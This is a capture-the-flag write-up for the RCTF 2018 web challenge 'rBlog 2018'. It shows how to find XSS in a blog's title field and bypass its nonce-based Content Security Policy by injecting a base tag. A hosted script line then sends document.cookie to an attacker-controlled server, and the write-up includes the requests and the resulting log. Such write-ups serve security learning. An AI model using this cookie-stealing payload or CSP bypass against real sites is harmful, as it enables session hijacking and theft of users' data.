Tags: xss web csp-bypass 

Rating: 5.0

# ▼▼▼rBlog 2018(Web:434pts) solved:27/400=6.8%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
get `document.cookie`
http://rblog.2018.teamrois.cn
```

---

To get document.cookie, execution of script is required.

---

**【Understanding of functions】**

http://rblog.2018.teamrois.cn

```
About rBlog 2018
Store your secrets here but don't do evil things

Report Abuse
Report to admin who is using latest version of Chrome Stable
```

・There is a function to **upload blog contents(title / contents / style / image)**.

・There is a function to **report to admin**.

---

**【Identify the location of the vulnerability】**

Try sending the request below

```
POST / HTTP/1.1
Host: rblog.2018.teamrois.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2cf9BXkX7RWDsXyP

------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="title"

<>1
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="content"

<>2
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="effect"

------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary2cf9BXkX7RWDsXyP--
```

---

I can see the contents with the following request

```
GET /blog.php/79b4463a97b6a4fa223f02e899a4b46b43c9dd32 HTTP/1.1
Host: rblog.2018.teamrois.cn
```

```
HTTP/1.1 200 OK
Date: Mon, 21 May 2018 09:49:16 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.5
Referrer-Policy: strict-origin
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
Vary: Accept-Encoding
Content-Length: 696
Connection: close
Content-Type: text/html; charset=UTF-8

<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="/assets/css/bootstrap.min.css">
<link rel="stylesheet" href="/assets/css/style.css">
<link href="https://fonts.googleapis.com/css?family=Titillium+Web" rel="stylesheet">
<title>rBlog 2018</title>
</head>
<body>
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>

<>2


</div>
</div>
</div>
<script nonce="3ae08923a2654e27a3734f7876a5abe0" src="/assets/js/jquery.min.js"></script>
</body>
</html>
```

`<>1`

XSS vulnerability with `title` parameter

---

**【Confirmation of defense mechanism】**

```
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
```

↓ Check restrictions related to script execution

```
default-src 'none'
script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0';
```

Execution of script is possible in the following form

```
<script src=●●● nonce={random}></script>
```

---

Confirm around XSS.

```
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>

<>2


</div>
</div>
</div>
<script nonce="3ae08923a2654e27a3734f7876a5abe0" src="/assets/js/jquery.min.js"></script>
```

There is a script tag read in `relative path after XSS`,and `base-uri is not restricted in CSP`.

---

**【exploit】**

1. Create Payload

Insert `<base href ="http://【my_server】/">` in the `title` parameter

↓ Then, the following script behavior is ...

`<script nonce="3ae08923a2654e27a3734f7876a5abe0" src="/assets/js/jquery.min.js"></script>` will access `http://【my_server】/assets/js/jquery.min.js`

---

2. Place the following javascript in `http://【my_server】/assets/js/jquery.min.js`

```
location.href="http://【my_server】?"+document.cookie;
```

---

3. Send Payload to admin

admin has accessed 【my_server】

```
115.159.200.107 - - [20/May/2018:07:02:09 +0000] "GET /?flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012};%20hint_for_rBlog_Rev.2=http://rblog.2018.teamrois.cn/blog.php/52c533a30d8129ee4915191c57965ef4c7718e6d HTTP/1.1" 200 2261
```

`flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012}`